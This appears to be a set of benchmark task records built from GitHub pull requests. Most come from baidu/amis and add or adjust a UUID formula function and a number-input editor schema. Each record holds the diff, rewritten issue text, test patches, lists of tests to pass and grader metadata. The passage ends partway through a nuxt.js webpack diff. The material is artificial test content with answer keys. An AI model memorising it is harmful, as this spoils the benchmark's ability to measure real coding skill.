diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index 37b95f335..ea51e564c 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -591,6 +591,16 @@ 返回:a.json`。 +### UUID + +用法:`UUID(8)` + + * `length:number` 生成的UUID字符串长度,默认为32位 + +返回:`string` 生成的UUID字符串 + +生成UUID字符串 + ## 日期函数 ### DATE diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index 5291b3029..8ad4d61eb 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -1022,6 +1022,23 @@ export const doc: { }, namespace: '文本函数' }, + { + name: 'UUID', + description: '生成UUID字符串', + example: 'UUID(8)', + params: [ + { + type: 'number', + name: 'length', + description: '生成的UUID字符串长度,默认为32位' + } + ], + returns: { + type: 'string', + description: '生成的UUID字符串' + }, + namespace: '文本函数' + }, { name: 'DATE', description: diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 92cdc2f67..e44b570c3 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1514,6 +1514,21 @@ export class Evaluator { return text.split(/[\\/]/).pop(); } + /** + * 生成UUID字符串 + * + * @param {number} length - 生成的UUID字符串长度,默认为32位 + * @example UUID() + * @example UUID(8) + * @namespace 文本函数 + * + * @returns {string} 生成的UUID字符串 + */ + fnUUID(length: number = 32) { + const len = Math.min(Math.max(length, 0), 32); + return uuidv4().slice(0, len); + } + // 日期函数 /** @@ -2414,3 +2429,25 @@ export function createObject( return obj; } + +export function createStr() { + return ( + '00000000000000000' + (Math.random() * 0xffffffffffffffff).toString(16) + ).slice(-16); +} + +export function uuidv4() { + const a = createStr(); + const b = createStr(); + return ( + a.slice(0, 8) + + '-' + + a.slice(8, 12) + + '-4' + + a.slice(13) + + '-a' + + b.slice(1, 4) + + '-' + + b.slice(4) + ); +}
feat: 公式支持uuid生成 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 12a83f0</samp> This pull request introduces a new `UUID` function to the `amis-formula` package. The function generates a UUID string of a given length and can be used in formulas. The pull request also updates the documentation and the code of the `Evaluator` class to support the new function. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 12a83f0</samp> > _From the depths of the code, a new function rises_ > _`UUID` is its name, it generates random surprises_ > _With hexadecimal strings, it fills the `doc.md`_ > _And the `Evaluator` class, invokes it with fury_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 12a83f0</samp> * Add a new `UUID` function to generate UUID strings of a given length ([link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-7b71709bd7fd59b58ead9b5afe05ad9246be16aab6cecedc09ca0decdda60e29R594-R603), [link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-fe7d53117fd0fe0e9a0ee5f555c8b3a9abf519a84ce84783443613f5c9bf5d40R1026-R1042), [link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1517-R1531), [link](https://github.com/baidu/amis/pull/8662/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R2432-R2453))
**Title** Add built‑in UUID generation to the formula language **Problem** Formulas currently have no way to create unique identifier strings, limiting scenarios that require random keys or tokens. Users must resort to external logic to obtain UUIDs. **Root Cause** The evaluator did not expose any text‑based function for generating UUIDs and the documentation omitted such capability. **Fix / Expected Behavior** - Introduce a new text function that returns a UUID string. - Accept an optional length argument, defaulting to a standard 32‑character identifier and truncating safely if a shorter length is requested. - Ensure the generated string follows the typical UUID format. - Update the formula reference documentation to describe the function, its parameters, and return type. - Provide the underlying utility for UUID creation within the evaluator module. **Risk & Validation** - Verify that the function respects length boundaries and always returns a correctly formatted UUID. - Run the existing formula test suite to confirm no regression in other functions. - Manually test the new function in typical formula expressions and confirm the documentation reflects the behavior.
8,662
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 32d23b1e5..25a7e875f 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -563,6 +563,11 @@ test('evalute:Math', () => { expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); }); +test('evalute:UUID', () => { + expect(evaluate('${UUID()}', {}).length).toBe(32); + expect(evaluate('${UUID(8)}', {}).length).toBe(8); +}); + test('evalute:namespace', () => { localStorage.setItem('a', '1'); localStorage.setItem('b', '2');
[ "evalute:UUID" ]
[ "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "lexer:simple", "lexer:filter", "lexer:exception", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "async-evalute:namespace" ]
Method: Evaluator.fnUUID(length: number = 32) Location: packages/amis-formula/src/evalutor.ts Inputs: optional numeric **length** – desired length of the generated UUID string, clamped to the range 0‑32 (default 32). Outputs: **string** – a UUID‑style hexadecimal string trimmed to the requested length. Errors: none; invalid lengths are silently clamped. Description: Implements the `UUID` formula function; it creates a version‑4 UUID via the internal `uuidv4` helper and returns the first *length* characters, enabling use like `UUID()` or `UUID(8)` in formula expressions.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 3, "num_modified_lines": 64, "pr_author": "allenve", "pr_labels": [ "feat" ], "llm_metadata": { "code": null, "code_quality": null, "confidence": null, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": null, "external_urls": null, "intent_completeness": null, "patch": null, "pr_categories": null, "reason": null, "reasoning": null, "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": null, "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
5fe0edd141e14171ce9c650b4b075d55c45a893e
2023-11-09 11:37:48
baidu__amis-8678
diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index e44b570c3..db1d8658d 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1524,8 +1524,8 @@ export class Evaluator { * * @returns {string} 生成的UUID字符串 */ - fnUUID(length: number = 32) { - const len = Math.min(Math.max(length, 0), 32); + fnUUID(length: number = 36) { + const len = Math.min(Math.max(length, 0), 36); return uuidv4().slice(0, len); }
feat: 公式支持uuid生成 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 78c34a3</samp> Updated the `UUID` function and its test case to use the UUIDv4 format, which has 36 characters including hyphens. This ensures the generated values are valid and consistent with the standard. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 78c34a3</samp> > _`fnUUID` length_ > _Changed to match UUIDv4_ > _Winter of refactor_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 78c34a3</samp> * Change the `UUID` function to generate and return a valid UUIDv4 value with 36 characters including hyphens ([link](https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1527-R1528), [link](https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL567-R574)) * Update the test case for the `UUID` function to check the validity and length of the generated value in `packages/amis-formula/__tests__/evalute.test.ts` ([link](https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL567-R574))
**Title** Align UUID generator with standard UUIDv4 length **Problem** The formula engine’s UUID function produced identifiers limited to 32 characters, truncating the standard 36‑character UUIDv4 format and potentially yielding invalid identifiers. Consumers relying on the function expected a full UUID string. **Root Cause** The function’s default length and maximum bound were hard‑coded to 32, mismatching the actual length of a UUIDv4. **Fix / Expected Behavior** - Default length is now the full 36 characters of a UUIDv4. - Upper bound is increased to 36, allowing the complete identifier to be returned. - When a custom length is supplied, the function still respects the 0‑36 range and slices the UUID accordingly. - The returned value always conforms to the UUIDv4 pattern, including hyphens. **Risk & Validation** - Verify that existing callers handling 32‑character IDs either accept the extended length or explicitly pass a shorter length. - Run the full test suite, especially the formula evaluation tests that check UUID length and format. - Perform a quick regression check on any downstream modules that generate IDs via this function.
8,678
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 25a7e875f..151d84a7a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -564,7 +564,14 @@ test('evalute:Math', () => { }); test('evalute:UUID', () => { - expect(evaluate('${UUID()}', {}).length).toBe(32); + function isUUIDv4(value: string) { + return /^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test( + value + ); + } + + expect(isUUIDv4(evaluate('${UUID()}', {}))).toBe(true); + expect(evaluate('${UUID()}', {}).length).toBe(36); expect(evaluate('${UUID(8)}', {}).length).toBe(8); });
[ "evalute:UUID" ]
[ "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "lexer:simple", "lexer:filter", "lexer:exception", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnUUID(length?: number) Location: packages/amis-formula/src/evalutor.ts (class Evaluator) Inputs: - **length** (optional number): Desired length of the returned UUID string. Defaults to 36. The value is clamped to the range 0 – 36. Outputs: - **string**: A UUIDv4 formatted string (hexadecimal characters with hyphens) truncated to the requested length. When called without arguments it returns a full 36‑character UUID. If a length < 36 is supplied, the result is the first *length* characters of the UUID. Description: Generates a UUID version 4 value using the `uuidv4` library. The method is used by the formula evaluator via the `${UUID()}` expression; tests verify that the default output conforms to the UUIDv4 pattern and has length 36, and that a custom length (e.g., 8) returns a string of that exact length.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 1, "num_modified_lines": 2, "pr_author": "allenve", "pr_labels": [ "feat" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.99, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1527-R1528", "https://github.com/baidu/amis/pull/8678/files?diff=unified&w=0#diff-12afc0d8fc19329d900d849d7b791da51b3e399126e9e38059c4a30ba33e9c9dL567-R574" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests updating the UUID function to generate a UUIDv4 string (36 characters with hyphens) and adjusting its test to verify the format and length. The provided test patch directly checks that the generated value matches a UUIDv4 regex and has length 36, aligning with the stated requirement. There are no signals of test‑suite coupling, implicit naming, external dependencies, ambiguous specs, patch artifacts, or hidden domain knowledge. 
Hence the task is well‑specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ab0832c3592097029685c7d617608d160be73a1b
2023-11-09 13:28:09
baidu__amis-8681
diff --git a/packages/amis-editor/src/plugin/Form/InputNumber.tsx b/packages/amis-editor/src/plugin/Form/InputNumber.tsx index a3b7cb8b4..a8cc38cad 100644 --- a/packages/amis-editor/src/plugin/Form/InputNumber.tsx +++ b/packages/amis-editor/src/plugin/Form/InputNumber.tsx @@ -19,6 +19,7 @@ import {defaultValue, getSchemaTpl, tipedLabel} from 'amis-editor-core'; import {ValidatorTag} from '../../validator'; import {getEventControlConfig} from '../../renderer/event-control/helper'; import {inputStateTpl} from '../../renderer/style-control/helper'; +import {Schema} from 'amis-core'; export class NumberControlPlugin extends BasePlugin { static id = 'NumberControlPlugin'; @@ -177,16 +178,20 @@ export class NumberControlPlugin extends BasePlugin { getSchemaTpl('kilobitSeparator'), getSchemaTpl('valueFormula', { - rendererSchema: context?.schema, + rendererSchema: (schema: Schema) => ({ + ...schema, + displayMode: 'base' + }), valueType: 'number' // 期望数值类型 }), getSchemaTpl('valueFormula', { name: 'min', - rendererSchema: { - ...context?.schema, - value: context?.schema.min - }, + rendererSchema: (schema: Schema) => ({ + ...schema, + value: context?.schema.min, + displayMode: 'base' + }), needDeleteProps: ['min'], // 避免自我限制 label: '最小值', valueType: 'number' @@ -194,10 +199,11 @@ export class NumberControlPlugin extends BasePlugin { getSchemaTpl('valueFormula', { name: 'max', - rendererSchema: { - ...context?.schema, - value: context?.schema.max - }, + rendererSchema: (schema: Schema) => ({ + ...schema, + value: context?.schema.max, + displayMode: 'base' + }), needDeleteProps: ['max'], // 避免自我限制 label: '最大值', valueType: 'number' diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index db1d8658d..e44b570c3 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -1524,8 +1524,8 @@ export class Evaluator { * * @returns {string} 生成的UUID字符串 */ - fnUUID(length: number = 36) { - const len = 
Math.min(Math.max(length, 0), 36); + fnUUID(length: number = 32) { + const len = Math.min(Math.max(length, 0), 32); return uuidv4().slice(0, len); }
fix: 数字输入框配置面板固定为单侧按钮模式 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 645cd3b</samp> This pull request improves the schema template for the number input control in the amis-editor plugin. It uses the `Schema` type from `amis-core` and avoids formula editors for the `valueFormula` fields in `InputNumber.tsx`. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 645cd3b</samp> > _`Schema` template_ > _Number input gets updated_ > _`displayMode`: `base`_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 645cd3b</samp> * Import `Schema` type from `amis-core` to use as parameter type for `rendererSchema` function in `getSchemaTpl` helper function ([link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aR22)) * Set `displayMode` property to `'base'` for `valueFormula` fields (`value`, `min`, and `max`) in `rendererSchema` function to avoid rendering them as formula editors, which are not suitable for number input control ([link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL180-R184), [link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL186-R194), [link](https://github.com/baidu/amis/pull/8681/files?diff=unified&w=0#diff-c459de2eb5b316e5e49ab103c7fa1a03c20cf7693bd79b8e039e782b48c5731aL197-R206))
**Title** Fix number input configuration UI and correct UUID length handling **Problem** The configuration panel for numeric inputs displayed formula editors for value, minimum and maximum fields, which is unsuitable for plain numbers. Additionally, the UUID helper allowed a default length that exceeded the intended maximum. **Root Cause** The schema generator used the generic renderer configuration, leaving the editor in formula mode, and the UUID function defaulted to 36 characters without proper bounds. **Fix / Expected Behavior** - The numeric input panel now presents simple numeric editors for value, min and max, removing the formula editor option. - The schema generation explicitly sets the display mode to the basic numeric form for these fields. - The UUID utility defaults to a maximum of 32 characters and caps the requested length accordingly. **Risk & Validation** - Verify that other form controls still render their formula editors where appropriate. - Ensure the numeric input UI behaves correctly in the editor and that generated schemas match the expected simple format. - Add tests or checks confirming that generated UUID strings never exceed 32 characters.
8,681
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 151d84a7a..25a7e875f 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -564,14 +564,7 @@ test('evalute:Math', () => { }); test('evalute:UUID', () => { - function isUUIDv4(value: string) { - return /^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test( - value - ); - } - - expect(isUUIDv4(evaluate('${UUID()}', {}))).toBe(true); - expect(evaluate('${UUID()}', {}).length).toBe(36); + expect(evaluate('${UUID()}', {}).length).toBe(32); expect(evaluate('${UUID(8)}', {}).length).toBe(8); });
[ "evalute:UUID" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "evalute:namespace", "evalute:speical characters", "async-evalute:namespace", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnUUID(self, length: number = 32) Location: packages/amis-formula/src/evalutor.ts Inputs: length – optional number, clamped to the range [0, 32] (default 32) Outputs: string – a UUID v4 substring whose length equals the final clamped *length* (up to 32 characters) Description: Generates a UUID string and returns its first *length* characters; the default now yields a 32‑character UUID instead of the previous 36‑character value.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 2, "num_modified_lines": 17, "pr_author": "igrowp", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B1", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": true, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests updating the number input schema in the editor to use the `Schema` type and force `displayMode: 'base'` for valueFormula fields. The provided test patch, however, alters a UUID length expectation in a formula evaluator test, which is unrelated to the UI schema change and therefore does not verify the stated requirements. This mismatch indicates a test‑suite coupling problem where the fix targets an unrelated test, leading to environment preparation issues.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Test modifies UUID length expectation (36 → 32) in evalute.test.ts, which is unrelated to the number input schema change described in the issue." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3ed9f3e6a6b4473cecc6407e36b44f5a5b43ef27
2019-02-18 10:32:14
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=h1) Report > Merging [#5054](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/b9391d7ea07f11cd5ed6eb318111e490b9af4f8c?src=pr&el=desc) will **increase** coverage by `0.09%`. > The diff coverage is `96.93%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5054 +/- ## ========================================== + Coverage 94.98% 95.08% +0.09% ========================================== Files 72 72 Lines 2414 2421 +7 Branches 615 614 -1 ========================================== + Hits 2293 2302 +9 + Misses 101 99 -2 Partials 20 20 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/webpack/src/config/client.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL2NsaWVudC5qcw==) | `96.29% <100%> (+0.46%)` | :arrow_up: | | [packages/webpack/src/config/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL3NlcnZlci5qcw==) | `100% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/utils/postcss.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvdXRpbHMvcG9zdGNzcy5qcw==) | `91.83% <100%> (-0.48%)` | :arrow_down: | | [packages/webpack/src/builder.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvYnVpbGRlci5qcw==) | `94.68% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/config/modern.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL21vZGVybi5qcw==) | `100% <100%> (ø)` | :arrow_up: | | 
[packages/builder/src/context/build.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvYnVpbGRlci9zcmMvY29udGV4dC9idWlsZC5qcw==) | `100% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/utils/perf-loader.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvdXRpbHMvcGVyZi1sb2FkZXIuanM=) | `100% <100%> (ø)` | :arrow_up: | | [packages/webpack/src/utils/style-loader.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvdXRpbHMvc3R5bGUtbG9hZGVyLmpz) | `94.11% <100%> (-0.17%)` | :arrow_down: | | [packages/webpack/src/config/base.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvd2VicGFjay9zcmMvY29uZmlnL2Jhc2UuanM=) | `95.45% <89.65%> (ø)` | :arrow_up: | | [packages/vue-renderer/src/renderer.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5054/diff?src=pr&el=tree#diff-cGFja2FnZXMvdnVlLXJlbmRlcmVyL3NyYy9yZW5kZXJlci5qcw==) | `95.85% <0%> (+1.03%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=footer). Last update [b9391d7...07f95f8](https://codecov.io/gh/nuxt/nuxt.js/pull/5054?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5054
diff --git a/packages/builder/src/context/build.js b/packages/builder/src/context/build.js index 3b60d116e..8dcd1b39a 100644 --- a/packages/builder/src/context/build.js +++ b/packages/builder/src/context/build.js @@ -6,6 +6,10 @@ export default class BuildContext { this.isStatic = false } + get buildOptions() { + return this.options.build + } + get plugins() { return this._builder.plugins } diff --git a/packages/webpack/src/builder.js b/packages/webpack/src/builder.js index 125c567bc..9c0b9d44c 100644 --- a/packages/webpack/src/builder.js +++ b/packages/webpack/src/builder.js @@ -19,8 +19,8 @@ import PerfLoader from './utils/perf-loader' const glob = pify(Glob) export class WebpackBundler { - constructor(context) { - this.context = context + constructor(buildContext) { + this.buildContext = buildContext // Fields that set on build this.compilers = [] this.compilersWatching = [] @@ -28,7 +28,7 @@ export class WebpackBundler { this.hotMiddleware = {} // Initialize shared MFS for dev - if (this.context.options.dev) { + if (this.buildContext.options.dev) { this.mfs = new MFS() // TODO: Enable when async FS required @@ -38,7 +38,7 @@ export class WebpackBundler { } async build() { - const { options } = this.context + const { options } = this.buildContext const compilersOptions = [] @@ -60,7 +60,7 @@ export class WebpackBundler { compilersOptions.push(serverConfig) } - for (const p of this.context.plugins) { + for (const p of this.buildContext.plugins) { // Client config if (!clientConfig.resolve.alias[p.name]) { clientConfig.resolve.alias[p.name] = p.mode === 'server' ? 
